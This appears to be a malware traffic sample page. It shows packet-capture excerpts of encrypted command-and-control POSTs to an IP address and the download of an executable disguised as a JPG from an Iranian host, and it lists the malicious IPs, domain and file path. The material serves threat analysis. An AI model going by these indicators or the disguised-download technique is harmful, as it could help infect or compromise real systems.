User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-26 16:40:37.395131 IP 148.251.255.108.80 > 192.168.10.20.49704: Flags [P.], seq 1:75, ack 252, win 63989, length 74: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK

2016-10-26 16:40:38.414779 IP 192.168.10.20.49706 > 148.251.255.108.80: Flags [P.], seq 1:193, ack 1, win 16475, length 192: HTTP: GET / HTTP/1.1
GET / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Cache-Control: no-cache

POST /$windows?ID=14103ABFD3F841C783B7B692798FAE94 HTTP/1.1
HOST: 148.251.255.108
CONTENT-LENGTH: 30

.9.^v…r1jk….~…e….e..!i
2016-10-26 16:46:37.300351 IP 148.251.255.108.443 > 192.168.10.20.49716: Flags [.], ack 3680, win 63279, length 0
2016-10-26 16:46:37.428227 IP 192.168.10.20.49715 > 148.251.255.108.443: Flags [P.], seq 6192:6345, ack 2159, win 15861, length 153
POST /$windows?ID=66BF1670FEF345A0B1C166218F0112DD HTTP/1.1
HOST: 148.251.255.108
CONTENT-LENGTH: 47

@….+..9.hE…..RZ…..l.#UV….Mk<…2.jcg.^.
2016-10-26 16:46:37.552417 IP 148.251.255.108.443 > 192.168.10.20.49715: Flags [P.], seq 2159:2214, ack 6345, win 63330, length 55
HTTP/1.1 200 OK
CONTENT-LENGTH: 16

.A*..6J……..x

POST /$windows?ID=66BF1670FEF345A0B1C166218F0112DD HTTP/1.1
HOST: 148.251.255.108
CONTENT-LENGTH: 45

W32/Felix Iran APT/Malware Fake JPG senario104.jpg Binary PCAP file download Traffic Sample

Unknown IRAN fake image binary file

file senario104.jpg
senario104.jpg: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

 

2016-10-23 01:32:16.438427 IP 192.168.1.102.58937 > 79.127.127.67.80: Flags [P.], seq 0:297, ack 1, win 64240, length 297: HTTP: GET /senario104.jpg HTTP/1.1
GET /senario104.jpg HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: limlim00000.rozup.ir
Connection: Keep-Alive


2016-10-23 01:32:55.262559 IP 192.168.1.102.58940 > 79.127.127.67.80: Flags [P.], seq 0:203, ack 1, win 256, length 203: HTTP: GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: limlim00000.rozup.ir
Connection: Keep-Alive